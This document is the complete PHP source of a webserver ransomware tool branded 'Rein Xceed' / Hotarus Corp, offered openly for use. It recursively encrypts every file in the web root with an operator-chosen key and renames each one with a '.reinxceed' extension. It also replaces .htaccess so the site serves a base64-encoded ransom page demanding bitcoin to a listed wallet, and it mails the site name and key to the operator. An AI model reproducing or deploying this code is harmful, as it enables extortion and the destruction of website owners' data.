Rein Xceed #Ransomware [Webserver+Tool]

1. <!DOCTYPE html>
2. <html>
3. <head>
4. <title>Hotarus Corp - Ransomware</title>
5. <style type="text/css">
6. body {
7. background: #1A1C1F;
8. color: #e2e2e2;
9. }
10. .inpute{
11. border-style: dotted;
12. border-color: #379600;
13. background-color: transparent;
14. color: white;
15. text-align: center;
16. }
17. .selecte{
18. border-style: dotted;
19. border-color: green;
20. background-color: transparent;
21. color: green;
22. }
23. .submite{
24. border-style: dotted;
25. border-color: #4CAF50;
26. background-color: transparent;
27. color: white;
28. }
29. .result{
30. text-align: left;
31. }
32. </style>
33. <link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css">
34. </head>
35. <body>
36. <div class="result">
37. <?php
38. error_reporting(0);
39. set_time_limit(0);
40. ini_set('memory_limit', '-1');
41. class deRanSomeware
42. {
43. public function shcpackInstall(){
44. if(!file_exists(".htarein")){
45. rename(".htaccess", ".htarein");
46. if(fwrite(fopen('.htaccess', 'w'), "#Bug7sec Team\r\nDirectoryIndex reinxceed.php\r\nErrorDocument 404 /reinxceed.php")){
47. echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> .htaccess (Default Page)<br>';
48. }
49. if(file_put_contents("reinxceed.php", base64_decode("PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgPHRpdGxlPkhvdGFydXMgQ29ycC48L3RpdGxlPgo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPgpib2R5IHsKICAgIGJhY2tncm91bmQ6ICMwMDA7CiAgICBjb2xvcjogI2ZmZjsKfQphewogICBjb2xvcjpyZWQ7Cn0KPC9zdHlsZT4KPC9oZWFkPgo8Ym9keT4KPGNlbnRlcj4KPHByZT4KCgooICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC9AQCYmJSAgICAgICgmQCZAJiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgIC4gICAgICAgICAgICAgICAgICAgQEAmICAjQCYsICAgICAgICAgICAgICAgICAgLi4gICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgLCUmQEBAJSAgICAgICAgICAgICAgLiZAQEBAQC4gICAgICAgICAgICAgICxAQEAmJi8gICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAvQCYqICAgICAgICAlJiYmJUBALy5AQCNAJkAmLiAgICAgICAgQEAlICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgIEAmLCAgICAuJkBAICAgQEAjICAsQEAvICAlQEAsICAgICAmQC8gICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICgmQCAgIC9AQC4gIyYmJSAgICAgIChAJiYgICZAJSAgICMmJiAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAmQEBAI0BAJkBAJi4gICUmQCZAJi4gICVAQCYmJigmQEAmLiAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAoQEAmJSAgIEAmJkBAJkBAQCZAQC4gICpAJiYlICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgIC4mQCYmLiAgICZAJiUgLkBALCAmQC8gKEBAQC4gICAjQEBAKiAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICxAQEAoICAgICVAJiUgICAgQCYqICAgJiYqICAgKCZAJiAgICAsQCZAKCAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICBAJkAvICAgICpAQCYgICAgICBAJiwgICAgIEAmKiAgICAgJUBAJiAgICAuJkAmLiAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAuQEAmICAgICAmQEAqICAgICAgLkAmLCAgICAgICBAQC8gICAgICAuQEAmLiAgICAoQCYoICAgICAgICAgICAgIAogICAgICAgICAgICAgICYmQCAgICAgQEAmICAgICAgICAsQEAuICAgICAgICAgQCYlICAgICAgICAmQEAsICAgICMmJiAgICAgICAgICAgIAogICAgICAgICAgICAgQCYoICAgICZAJiAgICAgICAgICUmQEAqICAgICAgICAuQEBAQCAgICAgICAgICUmQCAgICAuJkAsICAgICAgICAgIAogICAgICAgICAgICBAQCwgICAuQEAqICAgICAgICAjQEAqICZAJiAgICAgICZAJiAuQEAmICAgICAgICAgQEAoICAgICZAKCAgICAgICAgIAogICAgICAgICAgLEAmICAgICwmQCAgICAgICAuJkBALiAgICAgJkAlICAqJkAqICAgICAmJkAvICAgICAgICYmJiAgICAmJiggICAgICAgIAogICAgICAgICAuQEAsICAgLkBALiAgICwmQEBALyAgICAgICAgIC9AQEBAJSAgICAgICAgICwmQEBAKiAgICAmQC8gICAgQEAoICAgICAgIAogICAgICAgIC4mQC4gICAgJiYmJiZAQCYsICAgICAgICAgICAgICAmQEAmLCAgICAgICAgICAgICAuJUBAQCYlQEAgICAgICZALyAgICAgIAogICAgICAgIEAmKi4jQEAmJkAlICAgICAgICAgICAgICAgICAgJiYmIyomQEAgICAgICAgICAgICAgICAgICAoJkBAJkAlLiAmQCogICAgIAogICAgICAgQCZAQCYvICAuJkAgICAgICAgICAgICAgICAgICYmQCMgICAgKkBAJi4gICAgICAgICAgICAgICAgQCYlICAqJUAmQEAuICAgIAogICAgICAgICAgICAgICAoQCYgICAgICAgICAgICAgICAmQEAmICAgICAgICAjQEBALCAgICAgICAgICAgICAgI0AmICAgICAgICAgICAgIAogICAgICAgICAgICAgICAlQCUgICAgICAgICAgICAqQEBAQCggICAgICAgICAgICZAQEAjICAgICAgICAgICAgKkAmICAgICAgICAgICAgIAogICAgICAgICAgICAgICAmJiMgICAgICAgICAgJUBALyUmIyAgICAgICAgICAgIComQCxAJkAuICAgICAgICAgLkBAICAgICAgICAgICAgIAogICAgICAgICAgICAgICBAJiMgICAgICAgL0BAJiAgIC8mJiAgICAgICAgICAgICUmJiAgICZAQCUgICAgICAgIEBAICAgICAgICAgICAgIAogICAgICAgICAgICAgICBAQCMgICAgLEAmQCogICAgICAvJkAvICAgICAgICAuJkAlICAgICAgICZAQCggICAgIEBAICAgICAgICAgICAgIAogICAgICAgICAgICAgICBAQCMgKkAmJi8gICAgICAgICAgICwmQEBAJkAmQCYmKCAgICAgICAgICAgLkAmQCMgIEBAICAgICAgICAgICAgIAogICAgICAgICAgICAgICBAQEBAQCogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLkBAQEBAICAgICAgICAgICAgIAogICAgICAgICAgICAgICAsIy4gICAgICAgICZALCAgICAgICAgICAgICAgICAgICAgICAgICZALCAgICAgICAgICgoICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8qICAgICAgICAgICAgICAoLiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICMoICAgICAqQCYgICAgICAlLyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIApAKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAsJiYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAoKVHUgc2l0aW8gZnVlIHNlY3Vlc3RyYWRvIHBvciB1biBSQU5TT01XQVJFICBkZSBIb3RhcnVzIENvcnAuIGNvbnRhY3RhIGNvbiBub3NvdHJvcyBwYXJhIHNvcG9ydGU6CiAgICAgLVsgPGZvbnQgY29sb3I9InJlZCI+aG90YXJ1c3RlYW1AcHJvdG9ubWFpbC5jb208L2ZvbnQ+IF0tCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KUXVlIGVzIHVuIDxhIGhyZWY9Imh0dHBzOi8vZW4ud2lraXBlZGlhLm9yZy93aWtpL1JhbnNvbXdhcmUiPlJhbnNvbXdhcmU8L2E+Ljxicj4KUXVpZXJlcyByZWN1cGVyYXIgdHUgc2l0aW8gd2ViPwpUaWVuZXMgcXVlIHBhZ2FyIDI1MCBEb2xhcmVzIEFtZXJpY2Fub3MgZW4gQklUQ09JTlMKTnVtZXJvIGRlIGN1ZW50YTogPGZvbnQgY29sb3I9IiNmZmNhMjUiPmJjMXE1bm00dTR3d2MzZ3FkbDczYW42eGhjanc0YzRndWQ2bTI0NHpuZTwvZm9udD4KPC9wcmU+CjwvY2VudGVyPgo8L2JvZHk+CjwvaHRtbD4="))){
50. echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> reinxceed.php (Default Page)<br>';
51. }
52. }
53. }
54. public function shcpackUnstall(){
55.  
56. if( file_exists(".htarein") ){
57. if( unlink(".htaccess") && unlink("reinxceed.php") ){
58. echo '<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> .htaccess (Default Page)<br>';
59. echo '<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> reinxceed.php (Default Page)<br>';
60. }
61. rename(".htarein", ".htaccess");
62. }
63.  
64. }
65.  
66. public function plus(){
67. flush();
68. ob_flush();
69. }
70. public function locate(){
71. return getcwd();
72. }
73. public function shcdirs($dir,$method,$key){
74. switch ($method) {
75. case '1':
76. deRanSomeware::shcpackInstall();
77. break;
78. case '2':
79. deRanSomeware::shcpackUnstall();
80. break;
81. }
82. foreach(scandir($dir) as $d)
83. {
84. if($d!='.' && $d!='..')
85. {
86. $locate = $dir.DIRECTORY_SEPARATOR.$d;
87. if(!is_dir($locate)){
88. if( deRanSomeware::kecuali($locate,"ReinXceed.php") && deRanSomeware::kecuali($locate,".png") && deRanSomeware::kecuali($locate,".htaccess") && deRanSomeware::kecuali($locate,"reinxceed.php") && deRanSomeware::kecuali($locate,"index.php") && deRanSomeware::kecuali($locate,".htarein") ){
89. switch ($method) {
90. case '1':
91. deRanSomeware::shcEnCry($key,$locate);
92. deRanSomeware::shcEnDesDirS($locate,"1");
93. break;
94. case '2':
95. deRanSomeware::shcDeCry($key,$locate);
96. deRanSomeware::shcEnDesDirS($locate,"2");
97. break;
98. }
99. }
100. }else{
101. deRanSomeware::shcdirs($locate,$method,$key);
102. }
103. }
104. deRanSomeware::plus();
105. }
106. deRanSomeware::report($key);
107. }
108.  
109. public function report($key){
110. $message.= "========= Rein Xceed =========\n";
111. $message.= "Website : ".$_SERVER['HTTP_HOST'];
112. $message.= "Key : ".$key;
113. $message.= "========= Rein Xceed (2020) Ransomware =========\n";
114. $subject = "Report Ransomeware";
115. $headers = "From: Ransomware <ransomeware@shor7cut.today>\r\n";
116. mail("-- YOUR EMAIL --",$subject,$message,$headers);
117. }
118.  
119. public function shcEnDesDirS($locate,$method){
120. switch ($method) {
121. case '1':
122. rename($locate, $locate.".reinxceed");
123. break;
124. case '2':
125. $locates = str_replace(".reinxceed", "", $locate);
126. rename($locate, $locates);
127. break;
128. }
129. }
130.  
131. public function shcEnCry($key,$locate){
132. $data = file_get_contents($locate);
133. $iv = mcrypt_create_iv(
134. mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC),
135. MCRYPT_DEV_URANDOM
136. );
137.  
138. $encrypted = base64_encode(
139. $iv .
140. mcrypt_encrypt(
141. MCRYPT_RIJNDAEL_128,
142. hash('sha256', $key, true),
143. $data,
144. MCRYPT_MODE_CBC,
145. $iv
146. )
147. );
148. if(file_put_contents($locate, $encrypted )){
149. echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>';
150. }else{
151. echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> '.$locate.' <br>';
152. }
153. }
154.  
155. public function shcDeCry($key,$locate){
156. $data = base64_decode( file_get_contents($locate) );
157. $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
158.  
159. $decrypted = rtrim(
160. mcrypt_decrypt(
161. MCRYPT_RIJNDAEL_128,
162. hash('sha256', $key, true),
163. substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)),
164. MCRYPT_MODE_CBC,
165. $iv
166. ),
167. "\0"
168. );
169. if(file_put_contents($locate, $decrypted )){
170. echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>';
171. }else{
172. echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>';
173. }
174. }
175.  
176.  
177.  
178. public function kecuali($ext,$name){
179. $re = "/({$name})/";
180. preg_match($re, $ext, $matches);
181. if($matches[1]){
182. return false;
183. }
184. return true;
185. }
186. }
187.  
188. if($_POST['submit']){
189. switch ($_POST['method']) {
190. case '1':
191. deRanSomeware::shcdirs(deRanSomeware::locate(),"1",$_POST['key']);
192. break;
193. case '2':
194. deRanSomeware::shcdirs(deRanSomeware::locate(),"2",$_POST['key']);
195. break;
196. }
197. }else{
198. ?>
199. <center>
200. <pre>
201. (
202. /@@&&% (&@&@&
203. . @@& #@&, ..
204. ,%&@@@% .&@@@@@. ,@@@&&/
205. /@&* %&&&%@@/.@@#@&@&. @@%
206. @&, .&@@ @@# ,@@/ %@@, &@/
207. (&@ /@@. #&&% (@&& &@% #&&
208. &@@@#@@&@@&. %&@&@&. %@@&&&(&@@&.
209. (@@&% @&&@@&@@@&@@. *@&&%
210. .&@&&. &@&% .@@, &@/ (@@@. #@@@*
211. ,@@@( %@&% @&* &&* (&@& ,@&@(
212. @&@/ *@@& @&, @&* %@@& .&@&.
213. .@@& &@@* .@&, @@/ .@@&. (@&(
214. &&@ @@& ,@@. @&% &@@, #&&
215. @&( &@& %&@@* .@@@@ %&@ .&@,
216. @@, .@@* #@@* &@& &@& .@@& @@( &@(
217. ,@& ,&@ .&@@. &@% *&@* &&@/ &&& &&(
218. .@@, .@@. ,&@@@/ /@@@@% ,&@@@* &@/ @@(
219. .&@. &&&&&@@&, &@@&, .%@@@&%@@ &@/
220. @&*.#@@&&@% &&&#*&@@ (&@@&@%. &@*
221. @&@@&/ .&@ &&@# *@@&. @&% *%@&@@.
222. (@& &@@& #@@@, #@&
223. %@% *@@@@( &@@@# *@&
224. &&# %@@/%&# *&@,@&@. .@@
225. @&# /@@& /&& %&& &@@% @@
226. @@# ,@&@* /&@/ .&@% &@@( @@
227. @@# *@&&/ ,&@@@&@&@&&( .@&@# @@
228. @@@@@* .@@@@@
229. ,#. &@, &@, ((
230. /* (.
231. #( *@& %/
232. @* ,&&
233. HOTARUS CORP
234. -[ Contact : hotarusteam@protonmail.com ]-
235. </pre>
236. <form action="" method="post" style=" text-align: center;">
237. <label>Key : </label>
238. <input type="text" name="key" class="inpute" placeholder="KEY ENC/DEC">
239. <select name="method" class="selecte">
240. <option value="1">Secuestrar</option>
241. <option value="2">Liberar</option>
242. </select>
243. <input type="submit" name="submit" class="submite" value="Submit" />
244. </form>
245. <?php
246. }?>
247. </div>
248. </body>
249. </html>
250.  
251.  
252. <?php
253.  
254. ?>